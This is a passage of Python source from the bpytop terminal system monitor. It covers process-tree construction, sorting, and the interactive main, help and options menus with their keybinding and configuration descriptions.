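#* When an ancestor is collapsed (collapse_to is set) this process is not listed on its own; its threads, mem and cpu are added to the collapsed ancestor's totals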
if collapse_to and not search:
out[collapse_to]["threads"] += threads
out[collapse_to]["mem"] += mem
out[collapse_to]["mem_b"] += mem_b
out[collapse_to]["cpu"] += cpu
else:
if pid in tree and len(tree[pid]) > 0:
sign: str = "+" if collapse else "-"
inindent = inindent.replace(" ├─ ", "[" + sign + "]─").replace(" └─ ", "[" + sign + "]─")
out[pid] = {
"indent" : inindent,
"name": name,
"cmd" : cmd,
"threads" : threads,
"username" : username,
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu,
"depth" : depth,
}
if search: collapse = False
elif collapse and not collapse_to:
collapse_to = pid
if pid not in tree:
return
children = tree[pid][:-1]
for child in children:
create_tree(child, tree, indent + " │ ", indent + " ├─ ", found=found, depth=depth+1, collapse_to=collapse_to)
create_tree(tree[pid][-1], tree, indent + " ", indent + " └─ ", depth=depth+1, collapse_to=collapse_to)
create_tree(min(tree), tree)
cls.det_cpu = det_cpu
if cls.collect_interrupt: return
if cls.tree_counter >= 100:
cls.tree_counter = 0
for pid in list(cls.collapsed):
if not psutil.pid_exists(pid):
del cls.collapsed[pid]
cls.num_procs = len(out)
cls.processes = out.copy()
@classmethod
def sorting(cls, key: str):
index: int = CONFIG.sorting_options.index(CONFIG.proc_sorting) + (1 if key in ["right", "l"] else -1)
if index >= len(CONFIG.sorting_options): index = 0
elif index < 0: index = len(CONFIG.sorting_options) - 1
CONFIG.proc_sorting = CONFIG.sorting_options[index]
if "left" in Key.mouse: del Key.mouse["left"]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
@classmethod
def _draw(cls):
ProcBox._draw_fg()
class Menu:
'''Holds all menus'''
active: bool = False
close: bool = False
resized: bool = True
menus: Dict[str, Dict[str, str]] = {}
menu_length: Dict[str, int] = {}
background: str = ""
for name, menu in MENUS.items():
menu_length[name] = len(menu["normal"][0])
menus[name] = {}
for sel in ["normal", "selected"]:
menus[name][sel] = ""
for i in range(len(menu[sel])):
menus[name][sel] += Fx.trans(f'{Color.fg(MENU_COLORS[sel][i])}{menu[sel][i]}')
if i < len(menu[sel]) - 1: menus[name][sel] += f'{Mv.d(1)}{Mv.l(len(menu[sel][i]))}'
@classmethod
def main(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
banner: str = ""
redraw: bool = True
key: str = ""
mx: int = 0
my: int = 0
skip: bool = False
mouse_over: bool = False
mouse_items: Dict[str, Dict[str, int]] = {}
cls.active = True
cls.resized = True
menu_names: List[str] = list(cls.menus.keys())
menu_index: int = 0
menu_current: str = menu_names[0]
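#* The menu background is the saved screen buffer with colors stripped and recolored with the inactive foreground color, giving a dimmed backdrop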
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
while not cls.close:
key = ""
if cls.resized:
banner = (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
if UpdateChecker.version != VERSION:
banner += f'{Mv.to(Term.height, 1)}{Fx.b}{THEME.title}New release {UpdateChecker.version} available at https://github.com/aristocratos/bpytop{Fx.ub}{Term.fg}'
cy = 0
for name, menu in cls.menus.items():
ypos = Term.height // 2 - 2 + cy
xpos = Term.width // 2 - (cls.menu_length[name] // 2)
mouse_items[name] = { "x1" : xpos, "x2" : xpos + cls.menu_length[name] - 1, "y1" : ypos, "y2" : ypos + 2 }
cy += 3
redraw = True
cls.resized = False
if redraw:
out = ""
for name, menu in cls.menus.items():
out += f'{Mv.to(mouse_items[name]["y1"], mouse_items[name]["x1"])}{menu["selected" if name == menu_current else "normal"]}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{banner}{out}')
skip = redraw = False
if Key.input_wait(Timer.left(), mouse=True):
if Key.mouse_moved():
mx, my = Key.get_mouse()
for name, pos in mouse_items.items():
if pos["x1"] <= mx <= pos["x2"] and pos["y1"] <= my <= pos["y2"]:
mouse_over = True
if name != menu_current:
menu_current = name
menu_index = menu_names.index(name)
redraw = True
break
else:
mouse_over = False
else:
key = Key.get()
if key == "mouse_click" and not mouse_over:
key = "M"
if key == "q":
clean_quit()
elif key in ["escape", "M"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "shift_tab"]:
menu_index -= 1
if menu_index < 0: menu_index = len(menu_names) - 1
menu_current = menu_names[menu_index]
redraw = True
elif key in ["down", "mouse_scroll_down", "tab"]:
menu_index += 1
if menu_index > len(menu_names) - 1: menu_index = 0
menu_current = menu_names[menu_index]
redraw = True
elif key == "enter" or (key == "mouse_click" and mouse_over):
if menu_current == "quit":
clean_quit()
elif menu_current == "options":
cls.options()
cls.resized = True
elif menu_current == "help":
cls.help()
cls.resized = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def help(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
out_misc : str = ""
redraw: bool = True
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
help_items: Dict[str, str] = {
"(Mouse 1)" : "Clicks buttons and selects in process list.",
"Selected (Mouse 1)" : "Show detailed information for selected process.",
"(Mouse scroll)" : "Scrolls any scrollable list/text under cursor.",
"(Esc, shift+m)" : "Toggles main menu.",
"(m)" : "Cycle view presets, order: full->proc->stat->user.",
"(1)" : "Toggle CPU box.",
"(2)" : "Toggle MEM box.",
"(3)" : "Toggle NET box.",
"(4)" : "Toggle PROC box.",
"(d)" : "Toggle disks view in MEM box.",
"(F2, o)" : "Shows options.",
"(F1, shift+h)" : "Shows this window.",
"(ctrl+z)" : "Sleep program and put in background.",
"(ctrl+c, q)" : "Quits program.",
"(+) / (-)" : "Add/Subtract 100ms to/from update timer.",
"(Up, k) (Down, j)" : "Select in process list.",
"(Enter)" : "Show detailed information for selected process.",
"(Spacebar)" : "Expand/collapse the selected process in tree view.",
"(Pg Up) (Pg Down)" : "Jump 1 page in process list.",
"(Home) (End)" : "Jump to first or last page in process list.",
"(Left, h) (Right, l)" : "Select previous/next sorting column.",
"(b) (n)" : "Select previous/next network device.",
"(s)" : "Toggle showing swap as a disk.",
"(i)" : "Toggle disks io mode with big graphs.",
"(z)" : "Toggle totals reset for current network device",
"(a)" : "Toggle auto scaling for the network graphs.",
"(y)" : "Toggle synced scaling mode for network graphs.",
"(f, /)" : "Input a NON case-sensitive process filter.",
"(shift+f)" : "Input a case-sensitive process filter.",
"(c)" : "Toggle per-core cpu usage of processes.",
"(r)" : "Reverse sorting order in processes box.",
"(e)" : "Toggle processes tree view.",
"(delete)" : "Clear any entered filter.",
"Selected (shift+t)" : "Terminate selected process with SIGTERM - 15.",
"Selected (shift+k)" : "Kill selected process with SIGKILL - 9.",
"Selected (shift+i)" : "Interrupt selected process with SIGINT - 2.",
"_1" : " ",
"_2" : "For bug reporting and project updates, visit:",
"_3" : "https://github.com/aristocratos/bpytop",
}
while not cls.close:
key = ""
if cls.resized:
y = 8 if Term.height < len(help_items) + 10 else Term.height // 2 - len(help_items) // 2 + 4
out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-36
h, w = Term.height-2-y, 72
if len(help_items) > h:
pages = ceil(len(help_items) / h)
else:
h = len(help_items)
pages = 0
page = 1
out_misc += create_box(x, y, w, h+3, "help", line_color=THEME.div_line)
redraw = True
cls.resized = False
if redraw:
out = ""
cy = 0
if pages:
out += (f'{Mv.to(y, x+56)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, (keys, desc) in enumerate(help_items.items()):
if pages and n < (page - 1) * h: continue
out += f'{Mv.to(y+2+cy, x+1)}{Fx.b}{("" if keys.startswith("_") else keys):^20.20}{Fx.ub}{desc:50.50}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+2+cy+i, x+1)}{" " * (w-2)}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
if key == "mouse_click":
mx, my = Key.get_mouse()
if x <= mx < x + w and y <= my < y + h + 3:
if pages and my == y and x + 56 < mx < x + 61:
key = "up"
elif pages and my == y and x + 63 < mx < x + 68:
key = "down"
else:
key = "escape"
if key == "q":
clean_quit()
elif key in ["escape", "M", "enter", "backspace", "H", "f1"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "page_up"] and pages:
page -= 1
if page < 1: page = pages
redraw = True
elif key in ["down", "mouse_scroll_down", "page_down"] and pages:
page += 1
if page > pages: page = 1
redraw = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def options(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
out_misc : str = ""
redraw: bool = True
selected_cat: str = ""
selected_int: int = 0
option_items: Dict[str, List[str]] = {}
cat_list: List[str] = []
cat_int: int = 0
change_cat: bool = False
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
d_quote: str
inputting: bool = False
input_val: str = ""
Theme.refresh()
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
categories: Dict[str, Dict[str, List[str]]] = {
"system" : {
"color_theme" : [
'Set color theme.',
'',
'Choose from all theme files in',
'"/usr/[local/]share/bpytop/themes" and',
'"~/.config/bpytop/themes".',
'',
'"Default" for builtin default theme.',
'User themes are prefixed by a plus sign "+".',
'',
'For theme updates see:',
'https://github.com/aristocratos/bpytop'],
"theme_background" : [
'If the theme set background should be shown.',
'',
'Set to False if you want terminal background',
'transparency.'],
"truecolor" : [
'Sets if 24-bit truecolor should be used.',
'(Requires restart to take effect!)',
'',
'Will convert 24-bit colors to 256 color',
'(6x6x6 color cube) if False.',
'',
'Set to False if your terminal doesn\'t have',
'truecolor support and can\'t convert to',
'256-color.'],
"shown_boxes" : [
'Manually set which boxes to show.',
'',
'Available values are "cpu mem net proc".',
'Separate values with whitespace.',
'',
'Toggle between presets with mode key "m".'],
"update_ms" : [
'Update time in milliseconds.',
'',
'Recommended 2000 ms or above for better sample',
'times for graphs.',
'',
'Min value: 100 ms',
'Max value: 86400000 ms = 24 hours.'],
"draw_clock" : [
'Draw a clock at top of screen.',
'(Only visible if cpu box is enabled!)',
'',
'Formatting according to strftime, empty',
'string to disable.',
'',
'Custom formatting options:',
'"/host" = hostname',
'"/user" = username',
'"/uptime" = system uptime',
'',
'Examples of strftime formats:',
'"%X" = locale HH:MM:SS',
'"%H" = 24h hour, "%I" = 12h hour',
'"%M" = minute, "%S" = second',
'"%d" = day, "%m" = month, "%y" = year'],
"background_update" : [
'Update main ui when menus are showing.',
'',
'True or False.',
'',
'Set this to False if the menus are flickering',
'too much for a comfortable experience.'],
"show_battery" : [
'Show battery stats.',
'(Only visible if cpu box is enabled!)',
'',
'Show battery stats in the top right corner',
'if a battery is present.'],
"show_init" : [
'Show init screen at startup.',
'',
'The init screen is purely cosmetic and',
'slows down startup to show status messages.'],
"update_check" : [
'Check for updates at start.',
'',
'Checks for latest version from:',
'https://github.com/aristocratos/bpytop'],
"log_level" : [
'Set loglevel for error.log',
'',
'Levels are: "ERROR" "WARNING" "INFO" "DEBUG".',
'The level set includes all lower levels,',
'i.e. "DEBUG" will show all logging info.']
},
"cpu" : {
"cpu_graph_upper" : [
'Sets the CPU stat shown in upper half of',
'the CPU graph.',
'',
'"total" = Total cpu usage.',
'"user" = User mode cpu usage.',
'"system" = Kernel mode cpu usage.',
'See:',
'https://psutil.readthedocs.io/en/latest/',
'#psutil.cpu_times',
'for attributes available on specific platforms.'],
"cpu_graph_lower" : [
'Sets the CPU stat shown in lower half of',
'the CPU graph.',
'',
'"total" = Total cpu usage.',
'"user" = User mode cpu usage.',
'"system" = Kernel mode cpu usage.',
'See:',
'https://psutil.readthedocs.io/en/latest/',
'#psutil.cpu_times',
'for attributes available on specific platforms.'],
"cpu_invert_lower" : [
'Toggles orientation of the lower CPU graph.',
'',
'True or False.'],
"cpu_single_graph" : [
'Completely disable the lower CPU graph.',
'',
'Shows only upper CPU graph and resizes it',
'to fit to box height.',
'',
'True or False.'],
"check_temp" : [
'Enable cpu temperature reporting.',
'',
'True or False.'],
"cpu_sensor" : [
'Cpu temperature sensor',
'',
'Select the sensor that corresponds to',
'your cpu temperature.',
'Set to "Auto" for auto detection.'],
"show_coretemp" : [
'Show temperatures for cpu cores.',
'',
'Only works if check_temp is True and',
'the system is reporting core temps.'],
"temp_scale" : [
'Which temperature scale to use.',
'',
'Celsius, default scale.',
'',
'Fahrenheit, the american one.',
'',
'Kelvin, 0 = absolute zero, 1 degree change',
'equals 1 degree change in Celsius.',
'',
'Rankine, 0 = absolute zero, 1 degree change',
'equals 1 degree change in Fahrenheit.'],
"show_cpu_freq" : [
'Show CPU frequency',
'',
'Can cause slowdowns on systems with many',
'cores and psutil versions below 5.8.1'],
"custom_cpu_name" : [
'Custom cpu model name in cpu percentage box.',
'',
'Empty string to disable.'],
"show_uptime" : [
'Shows the system uptime in the CPU box.',
'',
'Can also be shown in the clock by using',
'"/uptime" in the formatting.',
'',
'True or False.'],
},
"mem" : {
"mem_graphs" : [
'Show graphs for memory values.',
'',
'True or False.'],
"show_disks" : [
'Split memory box to also show disks.',
'',
'True or False.'],
"show_io_stat" : [
'Toggle small IO stat graphs.',
'',
'Toggles the small IO graphs for the regular',
'disk usage view.',
'',
'True or False.'],
"io_mode" : [
'Toggles io mode for disks.',
'',
'Shows big graphs for disk read/write speeds',
'instead of used/free percentage meters.',
'',
'True or False.'],
"io_graph_combined" : [
'Toggle combined read and write graphs.',
'',
'Only has effect if "io mode" is True.',
'',
'True or False.'],
"io_graph_speeds" : [
'Set top speeds for the io graphs.',
'',
'Manually set which speed in MiB/s equals',
'100 percent in the io graphs.',
'(10 MiB/s by default).',
'',
'Format: "device:speed" separate disks with a',
'comma ",".',
'',
'Example: "/dev/sda:100, /dev/sdb:20".'],
"show_swap" : [
'If swap memory should be shown in memory box.',
'',
'True or False.'],
"swap_disk" : [
'Show swap as a disk.',
'',
'Ignores show_swap value above.',
'Inserts itself after first disk.'],
"only_physical" : [
'Filter out non physical disks.',
'',
'Set this to False to include network disks,',
'RAM disks and similar.',
'',
'True or False.'],
"use_fstab" : [
'Read disks list from /etc/fstab.',
'(Has no effect on macOS)',
'',
'This also disables only_physical.',
'',
'True or False.'],
"disks_filter" : [
'Optional filter for shown disks.',
'',
'Should be full path of a mountpoint,',
'"root" replaces "/", separate multiple values',
'with a comma ",".',
'Begin line with "exclude=" to change to exclude',
'filter.',
'Otherwise defaults to "most include" filter.',
'',
'Example: disks_filter="exclude=/boot, /home/user"'],
},
"net" : {
"net_download" : [
'Fixed network graph download value.',
'',
'Default "10M" = 10 MiB (mebibytes).',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'e.g. "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_upload" : [
'Fixed network graph upload value.',
'',
'Default "10M" = 10 MiB (mebibytes).',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'e.g. "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_auto" : [
'Start in network graphs auto rescaling mode.',
'',
'Ignores any values set above at start and',
'rescales down to 10 KiB at the lowest.',
'',
'True or False.'],
"net_sync" : [
'Network scale sync.',
'',
'Syncs the scaling for download and upload to',
'whichever currently has the highest scale.',
'',
'True or False.'],
"net_color_fixed" : [
'Set network graphs color gradient to fixed.',
'',
'If True the network graphs color is based',
'on the total bandwidth usage instead of',
'the current autoscaling.',
'',
'The bandwidth usage is based on the',
'"net_download" and "net_upload" values set',
'above.'],
"net_iface" : [
'Network Interface.',
'',
'Manually set the starting Network Interface.',
'Will otherwise automatically choose the NIC',
'with the highest total download since boot.'],
},
"proc" : {
"proc_update_mult" : [
'Processes update multiplier.',
'Sets how often the process list is updated as',
'a multiplier of "update_ms".',
'',
'Set to 2 or higher to greatly decrease bpytop',
'cpu usage. (Only integers)'],
"proc_sorting" : [
'Processes sorting option.',
'',
'Possible values: "pid", "program", "arguments",',
'"threads", "user", "memory", "cpu lazy" and',
'"cpu responsive".',
'',
'"cpu lazy" updates top process over time,',
'"cpu responsive" updates top process directly.'],
"proc_reversed" : [
'Reverse processes sorting order.',
'',
'True or False.'],
"proc_tree" : [
'Processes tree view.',
'',
'Set true to show processes grouped by parents,',
'with lines drawn between parent and child',
'process.'],
"tree_depth" : [
'Process tree auto collapse depth.',
'',
'Sets the depth where the tree view will auto',
'collapse processes at.'],
"proc_colors" : [
'Enable colors in process view.',
'',
'Uses the cpu graph gradient colors.'],
"proc_gradient" : [
'Enable process view gradient fade.',
'',
'Fades from top or current selection.',
'Max fade value is equal to current themes',
'"inactive_fg" color value.'],
"proc_per_core" : [
'Process usage per core.',
'',
'If process cpu usage should be of the core',
'it\'s running on or usage of the total',
'available cpu power.',
'',
'If true and process is multithreaded',
'cpu usage can reach over 100%.'],
"proc_mem_bytes" : [
'Show memory as bytes in process list.',
' ',
'True or False.'],
}
}
loglevel_i: int = CONFIG.log_levels.index(CONFIG.log_level)
cpu_sensor_i: int = CONFIG.cpu_sensors.index(CONFIG.cpu_sensor)
cpu_graph_i: Dict[str, int] = { "cpu_graph_upper" : CONFIG.cpu_percent_fields.index(CONFIG.cpu_graph_upper),
"cpu_graph_lower" : CONFIG.cpu_percent_fields.index(CONFIG.cpu_graph_lower)}
temp_scale_i: int = CONFIG.temp_scales.index(CONFIG.temp_scale)
color_i: int
max_opt_len: int = max([len(categories[x]) for x in categories]) * 2
cat_list = list(categories)
while not cls.close:
key = ""
if cls.resized or change_cat:
cls.resized = change_cat = False
selected_cat = list(categories)[cat_int]
option_items = categories[cat_list[cat_int]]
option_len: int = len(option_items) * 2
y = 12 if Term.height < max_opt_len + 13 else Term.height // 2 - max_opt_len // 2 + 7
out_misc = (f'{Banner.draw(y-10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-38
x2 = x + 27
h, w, w2 = min(Term.height-1-y, option_len), 26, 50
h -= h % 2
color_i = list(Theme.themes).index(THEME.current)
out_misc += create_box(x, y - 3, w+w2+1, 3, f'tab{Symbol.right}', line_color=THEME.div_line)
out_misc += create_box(x, y, w, h+2, "options", line_color=THEME.div_line)
redraw = True
cat_width = floor((w+w2) / len(categories))
out_misc += f'{Fx.b}'
for cx, cat in enumerate(categories):
out_misc += f'{Mv.to(y-2, x + 1 + (cat_width * cx) + round(cat_width / 2 - len(cat) / 2 ))}'
if cat == selected_cat:
out_misc += f'{THEME.hi_fg}[{THEME.title}{Fx.u}{cat}{Fx.uu}{THEME.hi_fg}]'
else:
out_misc += f'{THEME.hi_fg}{SUPERSCRIPT[cx+1]}{THEME.title}{cat}'
out_misc += f'{Fx.ub}'
if option_len > h:
pages = ceil(option_len / h)
else:
h = option_len
pages = 0
page = pages if selected_int == -1 and pages > 0 else 1
selected_int = 0 if selected_int >= 0 else len(option_items) - 1
if redraw:
out = ""
cy = 0
selected = list(option_items)[selected_int]
if pages:
out += (f'{Mv.to(y+h+1, x+11)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
#out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, opt in enumerate(option_items):
if pages and n < (page - 1) * ceil(h / 2): continue
value = getattr(CONFIG, opt)
t_color = f'{THEME.selected_bg}{THEME.selected_fg}' if opt == selected else f'{THEME.title}'
v_color = "" if opt == selected else f'{THEME.title}'
d_quote = '"' if isinstance(value, str) else ""
if opt == "color_theme":
counter = f' {color_i + 1}/{len(Theme.themes)}'
elif opt == "proc_sorting":
counter = f' {CONFIG.sorting_options.index(CONFIG.proc_sorting) + 1}/{len(CONFIG.sorting_options)}'
elif opt == "log_level":
counter = f' {loglevel_i + 1}/{len(CONFIG.log_levels)}'
elif opt == "cpu_sensor":
counter = f' {cpu_sensor_i + 1}/{len(CONFIG.cpu_sensors)}'
elif opt in ["cpu_graph_upper", "cpu_graph_lower"]:
counter = f' {cpu_graph_i[opt] + 1}/{len(CONFIG.cpu_percent_fields)}'
elif opt == "temp_scale":
counter = f' {temp_scale_i + 1}/{len(CONFIG.temp_scales)}'
else:
counter = ""
out += f'{Mv.to(y+1+cy, x+1)}{t_color}{Fx.b}{opt.replace("_", " ").capitalize() + counter:^24.24}{Fx.ub}{Mv.to(y+2+cy, x+1)}{v_color}'
if opt == selected:
if isinstance(value, bool) or opt in ["color_theme", "proc_sorting", "log_level", "cpu_sensor", "cpu_graph_upper", "cpu_graph_lower", "temp_scale"]:
out += f'{t_color} {Symbol.left}{v_color}{d_quote + str(value) + d_quote:^20.20}{t_color}{Symbol.right} '
elif inputting:
out += f'{str(input_val)[-17:] + Fx.bl + "█" + Fx.ubl + "" + Symbol.enter:^33.33}'
else:
out += ((f'{t_color} {Symbol.left}{v_color}' if type(value) is int else " ") +
f'{str(value) + " " + Symbol.enter:^20.20}' + (f'{t_color}{Symbol.right} ' if type(value) is int else " "))
else:
out += f'{d_quote + str(value) + d_quote:^24.24}'
out += f'{Term.bg}'
if opt == selected:
h2 = len(option_items[opt]) + 2
y2 = y + (selected_int * 2) - ((page-1) * h)
if y2 + h2 > Term.height: y2 = Term.height - h2
out += f'{create_box(x2, y2, w2, h2, "description", line_color=THEME.div_line)}{THEME.main_fg}'
for n, desc in enumerate(option_items[opt]):
out += f'{Mv.to(y2+1+n, x2+2)}{desc:.48}'
cy += 2
if cy >= h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+1+cy+i, x+1)}{" " * (w-2)}'
if not skip or redraw:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
redraw = True
has_sel = False
if key == "mouse_click" and not inputting:
mx, my = Key.get_mouse()
if x < mx < x + w + w2 and y - 4 < my < y:
# if my == y - 2:
for cx, cat in enumerate(categories):
ccx = x + (cat_width * cx) + round(cat_width / 2 - len(cat) / 2 )
if ccx - 2 < mx < ccx + 2 + len(cat):
key = str(cx+1)
break
elif x < mx < x + w and y < my < y + h + 2:
mouse_sel = ceil((my - y) / 2) - 1 + ceil((page-1) * (h / 2))
if pages and my == y+h+1 and x+11 < mx < x+16:
key = "page_up"
elif pages and my == y+h+1 and x+19 < mx < x+24:
key = "page_down"
elif my == y+h+1:
pass
elif mouse_sel == selected_int:
if mx < x + 6:
key = "left"
elif mx > x + 19:
key = "right"
else:
key = "enter"
elif mouse_sel < len(option_items):
selected_int = mouse_sel
has_sel = True
else:
key = "escape"
if inputting:
if key in ["escape", "mouse_click"]:
inputting = False
elif key == "enter":
inputting = False
if str(getattr(CONFIG, selected)) != input_val:
if selected == "update_ms":
if not input_val or int(input_val) < 100:
CONFIG.update_ms = 100
elif int(input_val) > 86399900:
CONFIG.update_ms = 86399900
else:
CONFIG.update_ms = int(input_val)
elif selected == "proc_update_mult":
if not input_val or int(input_val) < 1:
CONFIG.proc_update_mult = 1
else:
CONFIG.proc_update_mult = int(input_val)
Collector.proc_counter = 1
elif selected == "tree_depth":
if not input_val or int(input_val) < 0:
CONFIG.tree_depth = 0
else:
CONFIG.tree_depth = int(input_val)
ProcCollector.collapsed = {}
elif selected == "shown_boxes":
new_boxes: List = []
for box in input_val.split():
if box in ["cpu", "mem", "net", "proc"]:
new_boxes.append(box)
CONFIG.shown_boxes = " ".join(new_boxes)
Box.view_mode = "user"
Box.view_modes["user"] = CONFIG.shown_boxes.split()
Draw.clear(saved=True)
elif isinstance(getattr(CONFIG, selected), str):
setattr(CONFIG, selected, input_val)
if selected.startswith("net_"):
NetCollector.net_min = {"download" : -1, "upload" : -1}
elif selected == "draw_clock":
Box.clock_on = len(CONFIG.draw_clock) > 0
if not Box.clock_on: Draw.clear("clock", saved=True)
elif selected == "io_graph_speeds":
MemBox.graph_speeds = {}
Term.refresh(force=True)
cls.resized = False
elif key == "backspace" and len(input_val):
input_val = input_val[:-1]
elif key == "delete":
input_val = ""
elif isinstance(getattr(CONFIG, selected), str) and len(key) == 1:
input_val += key
elif isinstance(getattr(CONFIG, selected), int) and key.isdigit():
input_val += key
elif key == "q":
clean_quit()
elif key in ["escape", "o", "M", "f2"]:
cls.close = True
break
elif key == "tab" or (key == "down" and selected_int == len(option_items) - 1 and page in [0, pages]):
if cat_int == len(categories) - 1:
cat_int = 0
else:
cat_int += 1
change_cat = True
elif key == "shift_tab" or (key == "up" and selected_int == 0 and page == 1):
if cat_int == 0:
cat_int = len(categories) - 1
else:
cat_int -= 1
change_cat = True
selected_int = -1 if key != "shift_tab" else 0
elif key in list(map(str, range(1, len(cat_list)+1))) and key != str(cat_int + 1):
cat_int = int(key) - 1
change_cat = True
elif key == "enter" and selected in ["update_ms", "disks_filter", "custom_cpu_name", "net_download",
"net_upload", "draw_clock", "tree_depth", "proc_update_mult", "shown_boxes", "net_iface", "io_graph_speeds"]:
inputting = True
input_val = str(getattr(CONFIG, selected))
elif key == "left" and selected == "update_ms" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key == "right" and selected == "update_ms" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "left" and selected == "proc_update_mult" and CONFIG.proc_update_mult > 1:
CONFIG.proc_update_mult -= 1
Collector.proc_counter = 1
elif key == "right" and selected == "proc_update_mult":
CONFIG.proc_update_mult += 1
Collector.proc_counter = 1
elif key == "left" and selected == "tree_depth" and CONFIG.tree_depth > 0:
CONFIG.tree_depth -= 1
ProcCollector.collapsed = {}
elif key == "right" and selected == "tree_depth":
CONFIG.tree_depth += 1
ProcCollector.collapsed = {}
elif key in ["left", "right"] and isinstance(getattr(CONFIG, selected), bool):
setattr(CONFIG, selected, not getattr(CONFIG, selected))
if selected == "check_temp":
if CONFIG.check_temp:
CpuCollector.get_sensors()
else:
CpuCollector.sensor_method = ""
CpuCollector.got_sensors = False
if selected in ["net_auto", "net_color_fixed", "net_sync"]:
if selected == "net_auto": NetCollector.auto_min = CONFIG.net_auto
NetBox.redraw = True
if selected == "theme_background":
Term.bg = f'{THEME.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(Term.bg)
if selected == "show_battery":
Draw.clear("battery", saved=True)
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "color_theme" and len(Theme.themes) > 1:
if key == "left":
color_i -= 1
if color_i < 0: color_i = len(Theme.themes) - 1
elif key == "right":
color_i += 1
if color_i > len(Theme.themes) - 1: color_i = 0
Collector.collect_idle.wait()
CONFIG.color_theme = list(Theme.themes)[color_i]
THEME(CONFIG.color_theme)
Term.refresh(force=True)
Timer.finish()
elif key in ["left", "right"] and selected == "proc_sorting":
ProcCollector.sorting(key)
elif key in ["left", "right"] and selected == "log_level":
if key == "left":
loglevel_i -= 1
if loglevel_i < 0: loglevel_i = len(CONFIG.log_levels) - 1
elif key == "right":
loglevel_i += 1
if loglevel_i > len(CONFIG.log_levels) - 1: loglevel_i = 0
CONFIG.log_level = CONFIG.log_levels[loglevel_i]
errlog.setLevel(getattr(logging, CONFIG.log_level))
errlog.info(f'Loglevel set to {CONFIG.log_level}')
elif key in ["left", "right"] and selected in ["cpu_graph_upper", "cpu_graph_lower"]:
if key == "left":
cpu_graph_i[selected] -= 1
if cpu_graph_i[selected] < 0: cpu_graph_i[selected] = len(CONFIG.cpu_percent_fields) - 1
if key == "right":
cpu_graph_i[selected] += 1
if cpu_graph_i[selected] > len(CONFIG.cpu_percent_fields) - 1: cpu_graph_i[selected] = 0
